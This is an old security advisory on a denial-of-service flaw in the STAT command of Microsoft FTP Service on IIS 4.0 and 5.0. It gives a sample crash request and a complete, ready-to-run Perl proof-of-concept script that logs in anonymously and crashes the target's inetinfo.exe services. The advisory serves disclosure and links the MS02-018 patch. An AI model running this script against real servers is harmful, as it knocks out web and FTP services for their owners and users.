COMMAND

	Microsoft FTP Service DoS using STAT Globbing

SYSTEMS AFFECTED

	 IIS 5.0

	 IIS 4.0

PROBLEM

	H D Moore [http://www.digitaloffense.net/] found following :
	

	The Microsoft FTP service is vulnerable to a Denial  of  Service  attack
	in the STAT command. This DoS can be  triggered  by  a  remote  attacker
	using either a valid user account or the  anonymous  account,  which  is
	enabled by default. Once  exploited,  all  services  running  under  the
	inetinfo.exe process  will  terminate.  On  IIS  5.0  and  above,  these
	services are supposed to restart,  on  IIS  4.0  the  services  must  be
	restarted manually. This  vulnerability  appears  to  be  impossible  to
	exploit to gain a remote command shell. Versions other than 4.0 and  5.0
	were not tested.
	

	 Details

	 =======

	

	This vulnerability was discovered  in  November  2001  by  a  \"fuzzer\"
	script I wrote to  audit  FTP  daemons  for  problems  in  the  globbing
	functionality. This script created and  sent  random  arguments  to  the
	\"STAT\"  command  consisting  of  various  combinations   of   globbing
	characters. The original fuzzer had to be modified to  use  the  Windows
	glob characters instead of the normal Unix set. Within  20  seconds  the
	script had caused an access violation on a fully patched IIS server.
	

	An example request which can cause the crash:
	

	

	        STAT ?*<240 x X>

	

	

	The  crash  occurs  when  a  memchr  call  is  passed  a  pointer  which
	dereferences to a NULL. It may be  possible  to  overwrite  this  memory
	with an arbitrary path and  use  this  exploit  to  obtain  a  directory
	listing, but all attempts so far have failed and  constantly  restarting
	IIS and retrying was getting old.
	

	

	 Scripts

	 =======

	

	DoS Proof of Concept
	

	

	#!/usr/bin/perl -w

	##################

	##################

	#

	#

	#   URL: http://www.digitaloffense.net/

	# EMAIL: hdm@digitaloffense.net

	# USAGE: ./msftp_dos.pl <target ip>

	#

	# Summary:

	#

	#        The Microsoft FTP service contains a vulnerability in the STAT

	#        command with the pattern-matching (glob) code. This vulnerability

	#        could be exploited to execute a Denial of Service attack. This

	#        affects IIS 4.0 and 5.0 and requires the attacker to be able to 

	#        access the service either through a valid user account or via the

	#        anonymous login which is enabled by default. The DoS attack will

	#        bring down all services running under IIS (the inetinfo.exe process).

	#

	#        IIS 4.0 must be manually restarted to restore normal operation. IIS 5.0

	#        will automatically restart the crashed services, but any users connected

	#        to the service at the time of exploitation must reconnect.

	#

	#        At this time, there seems to be a slim-to-none chance of being able to

	#        execute arbitrary code through this vulnerability.

	#

	# Solution:

	#

	#	http://www.microsoft.com/technet/security/bulletin/MS02-018.asp

	#

	

	use Net::FTP;

	    

	$target = shift() || die \"usage: $0 <target ip>\";

	my $user = \"anonymous\";

	my $pass = \"crash\\@burn.com\";

	my $exp = (\"A\" x 240);

	

	print \":: Trying to connect to target system at: $target...\\n\";

	$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die \"could not connect: $!\";

	$ftp->login($user, $pass) || die \"could not login: $!\";

	$ftp->cwd(\"/\");

	

	print \":: Trying to crash the FTP service...\\n\";

	$ftp->quot(\"STAT *?\" . $exp);

	$ftp->quit;

	

	

	

	

	

SOLUTION

	Patch available at
	

	http://www.microsoft.com/technet/security/bulletin/MS02-018.asp

	

	

	

	 Credits

	 =======

	

	The following people helped in one form or another:
	 * bind

	 * rkl

	 * halvar

	 * tsnoop

	 * ah / da (vulnhelp)